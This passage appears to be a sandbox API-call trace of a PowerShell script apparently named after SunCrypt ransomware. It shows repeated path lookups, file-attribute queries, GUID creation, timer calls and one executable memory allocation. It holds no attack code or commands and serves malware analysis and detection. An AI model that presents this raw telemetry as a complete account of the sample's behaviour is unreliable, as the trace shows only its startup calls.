lpFileInformation=0x4ebee10 | out: 
lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.697] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701651395503) returned 1 [0103.697] EtwEventActivityIdControl () returned 0x0 [0103.698] EtwEventActivityIdControl () returned 0x0 [0103.698] EtwEventActivityIdControl () returned 0x0 [0103.698] EtwEventActivityIdControl () returned 0x0 [0103.698] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc51b1b8f, Data2=0xbe23, Data3=0x459c, Data4=([0]=0x85, [1]=0xcc, [2]=0x90, [3]=0x5c, [4]=0x9b, [5]=0xef, [6]=0x2b, [7]=0xea))) returned 0x0 [0103.699] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.699] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701651552442) returned 1 [0103.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.699] GetFullPathNameW 
(in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.699] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.700] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.702] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701651860357) returned 1 [0103.702] EtwEventActivityIdControl () returned 0x0 [0103.702] EtwEventActivityIdControl () returned 0x0 [0103.702] EtwEventActivityIdControl () returned 0x0 [0103.703] EtwEventActivityIdControl () returned 0x0 [0103.703] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x5e5ea9aa, Data2=0xa2e7, Data3=0x46bc, Data4=([0]=0xaf, [1]=0xb5, [2]=0xf5, [3]=0x5, 
[4]=0xee, [5]=0xd2, [6]=0xec, [7]=0xc0))) returned 0x0 [0103.703] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.703] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701652008809) returned 1 [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.706] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701652221095) returned 1 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] EtwEventActivityIdControl () returned 0x0 [0103.706] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7111b0b6, Data2=0xbd, Data3=0x46b9, Data4=([0]=0xa2, [1]=0xd5, [2]=0xf2, [3]=0xa1, [4]=0x48, [5]=0xde, [6]=0x8a, [7]=0xdc))) returned 0x0 [0103.707] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.707] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701652365595) returned 1 [0103.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.708] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.709] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701652560660) returned 1 [0103.709] EtwEventActivityIdControl () returned 0x0 [0103.709] EtwEventActivityIdControl () returned 0x0 [0103.709] EtwEventActivityIdControl () returned 0x0 [0103.710] EtwEventActivityIdControl () returned 0x0 [0103.710] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1c14eff1, Data2=0x20c8, Data3=0x4bbf, Data4=([0]=0xaa, [1]=0x77, [2]=0x79, [3]=0x79, [4]=0xcc, [5]=0x2d, [6]=0xb1, [7]=0xa9))) returned 0x0 [0103.710] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.711] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701652712174) returned 1 [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
lpFilePart=0x0) returned 0x3a [0103.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.713] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701652923939) returned 1 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] EtwEventActivityIdControl () returned 0x0 [0103.713] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x4322929b, Data2=0x8156, Data3=0x4998, Data4=([0]=0xae, [1]=0xbb, [2]=0x32, [3]=0xe3, [4]=0x2, [5]=0x38, [6]=0x61, [7]=0xb3))) returned 0x0 [0103.714] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.714] 
QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701653317814) returned 1 [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0103.717] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0103.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0103.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0103.723] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701653970327) returned 1 [0103.723] 
EtwEventActivityIdControl () returned 0x0 [0103.723] EtwEventActivityIdControl () returned 0x0 [0103.723] EtwEventActivityIdControl () returned 0x0 [0103.724] EtwEventActivityIdControl () returned 0x0 [0104.050] VirtualAlloc (lpAddress=0x0, dwSize=0xfca, flAllocationType=0x1000, flProtect=0x40) returned 0x41e0000 [0104.059] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x51f5c552, Data2=0x4aa, Data3=0x46a1, Data4=([0]=0xa7, [1]=0xed, [2]=0x77, [3]=0x21, [4]=0x9a, [5]=0x3e, [6]=0xe0, [7]=0xfa))) returned 0x0 [0104.060] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.060] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701687636451) returned 1 [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.060] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.060] 
SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.061] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701687810800) returned 1 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] EtwEventActivityIdControl () returned 0x0 [0104.062] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd7846124, Data2=0xfbe9, Data3=0x401f, Data4=([0]=0xa7, [1]=0xff, [2]=0x98, [3]=0x87, [4]=0x70, [5]=0x0, [6]=0x62, [7]=0xc4))) returned 0x0 [0104.062] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.063] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701687929127) returned 1 [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.063] GetFileAttributesExW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.063] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.065] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701688204981) returned 1 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] EtwEventActivityIdControl () returned 0x0 [0104.066] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8717aa56, Data2=0x1970, Data3=0x47ea, Data4=([0]=0xa2, [1]=0xd3, [2]=0x7, [3]=0x26, [4]=0x1b, [5]=0x77, [6]=0xc2, [7]=0x2d))) returned 0x0 [0104.066] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.067] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701688329059) returned 1 [0104.067] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.067] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.067] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.068] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701688489627) returned 1 [0104.068] EtwEventActivityIdControl () returned 0x0 [0104.068] EtwEventActivityIdControl () returned 0x0 [0104.068] EtwEventActivityIdControl () returned 0x0 
[0104.069] EtwEventActivityIdControl () returned 0x0 [0104.069] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbd9ae212, Data2=0x70c3, Data3=0x4931, Data4=([0]=0x98, [1]=0x8a, [2]=0x5a, [3]=0xe6, [4]=0x7c, [5]=0x5f, [6]=0x1a, [7]=0xd2))) returned 0x0 [0104.069] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.069] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701688606820) returned 1 [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.070] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 